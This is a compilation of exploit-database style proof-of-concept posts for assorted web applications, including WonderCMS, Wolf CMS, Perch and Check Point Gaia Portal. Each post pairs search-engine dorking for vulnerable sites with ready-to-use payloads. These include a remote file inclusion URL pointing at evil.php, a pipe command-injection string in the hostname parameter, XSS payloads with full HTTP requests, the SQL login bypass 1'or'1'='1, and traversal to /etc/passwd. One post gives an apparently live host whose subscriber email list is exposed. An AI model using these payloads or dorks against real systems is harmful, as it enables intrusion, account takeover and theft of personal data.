<pre><code>====================================================================================================================================<br />| # Title : WEBinsta Mailing Manager V1.3 Data Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.webinsta.com |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : maillist/temp/email.txt<br /><br />[+] http://lolpriceshopinfo/maillist/temp/email.txt<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Wolf CMS v0.8.1 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.wolfcms.org/ |<br />| # Dork : © Copyright 2014 Your name Wolf CMS Inside. |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process<br /><br />[+] use payload :/wolf/install/<br /><br />[+] http://127.0.0.1/wolf/install/<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WonderCMS v0.6-Beta File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://wondercms.com/ |<br />| # Dork : ©2015 Your website | Powered by WonderCMS | Login |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] File : editInplace.php .<br /><br />[+] Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?><br /><br />[+] Use payload : /js/editInplace.php?hook=http://127.0.0.1/evil.php<br /><br />[+] http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : xzengine v.1.7 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/ |<br />| # Dork : 2005-2007 Powered by xzengine v.1.7 beta 8 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.<br /><br />[+] Use payload : /install/install.php?step=params<br /><br />[+] http://127.0.0.1/xzengine/admin<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Yourdoctor CMS v1.5 Insecure Direct Object Reference Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493 | <br />| # Dork : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Unauthorized administrator access. Allows any visitor to Download subscriber list.<br /><br />[+] use payload : /admin/subscriber-csv.php<br /><br />[+] http://127.0.0.1/admin/subscriber-csv.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code> =========================<br />Exploit Title: Hostname injection leads to Remote Code Execution RCE (Authenticated)<br />Product: Gaia Portal<br />Vendor: Checkpoint<br />Vulnerable Versions: R81.20 < Take 14, R81.10 < Take 95, R81 < Take 82 and R80.40 < Take 198<br />Tested Version: R81.10 (take 335)<br />Advisory Publication: July 27, 2023<br />Latest Update: July 72, 2023<br />Vulnerability Type: Improper Control of Generation of Code (Code Injection) [CWE-94]<br />CVE Reference: CVE-2023-28130<br />CVSS Severity: High<br />CVSS Score: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H<br />Impact score: 8.4<br />Credit: Rick Verdoes & Danny de Weille (Hackify | pentests.nl)<br />=========================<br /><br /> I. BACKGROUND<br />-------------------------<br />Check Point Gaia Portal is an advanced web-based interface designed for the configuration of the Gaia platform, a security operating system that combines the strengths of both SecurePlatform and IPSO operating systems. The Gaia Portal allows for nearly all system configuration tasks to be performed through this interface.<br /><br /> II. VULNERABILITY<br />-------------------------<br />Check Point Gaia Portal has a vulnerability which allows an authenticated user with write permissions on the DNS settings to inject commands in a cgi script, leading to remote code execution on the operating system. The vulnerability lies in the parameter hostname in the web request /cgi-bin/hosts_dns.tcl, which is susceptible to command injection. This can be exploited by any user with a valid session, as long as the user has write permissions on the DNS settings. The injected commands are executed by the user 'Admin'.<br /><br /> III. Proof of Concept<br />-------------------------<br />hostname=name|`COMMAND`&domainname=test.local&save=1<br /><br /> IV. Impact<br />-------------------------<br />Successful exploitation allows a remote authenticated attacker to execute commands on the operating system.<br /><br /> V. References<br />-------------------------<br />Security advisories:<br />https://pentests.nl/pentest-blog/cve-2023-28130-command-injection-in-check-point-gaia-portal/<br />https://support.checkpoint.com/results/sk/sk181311<br /><br /><br /></code></pre>
<pre><code># Exploit Title:<br /># Date: 07/2023<br /># Exploit Author: Andrey Stoykov<br /># Version: 3.2<br /># Tested on: Windows Server 2022<br /># Blog: http://msecureltd.blogspot.com<br /><br /><br />XSS #1:<br /><br />File: roles.edit.post.php<br /><br />Line #57:<br /><br />[...]<br /><div class="field-wrap <?php echo $Form->error('roleTitle', false);?>"><br /> <?php echo $Form->label('roleTitle', 'Title'); ?><br /> <div class="form-entry"><br /> <?php echo $Form->text('roleTitle', $Form->get($details,<br />'roleTitle')); ?><br /> </div><br /> </div><br />[...]<br /><br /><br /><br />Steps to Reproduce:<br /><br />1. Login to application<br />2. Go to Roles<br />3. Select Title<br />4. Enter payload TEST"><img src=x onerror=alert(1)><br /><br /><br />// HTTP POST request<br /><br />POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1<br />Host: 192.168.1.11<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/114.0<br />[...]<br /><br />roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0<br /><br /><br />// HTTP response<br /><br />HTTP/1.1 200 OK<br />Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4<br />[...]<br /><br />[...]<br /><a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x<br />onerror=alert(1)></a><br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 01/08/2023<br /># Vendor: JLexArt<br /># Vendor Homepage: https://jlexart.com/<br /># Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/<br /># Demo: https://jlexguestbook.jlexart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /u/perry-705<br /><br />GET parameter 'q' is vulnerable to XSS<br /><br />http://website/u/perry-705?q=[XSS]&wl=1<br /><br /><br />XSS Payloads:<br /><br />db8ck"onfocus="confirm(1)"autofocus="xwu0k<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Cryptolive cms v1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://scriptmafia.org/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] user & pass : 1'or'1'='1<br /><br />[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CRM Education Akademik v9.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://p30vel.ir/ | <br />| # Dork : "media.php?module=home" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : downlot.php?file=\../../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwd<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
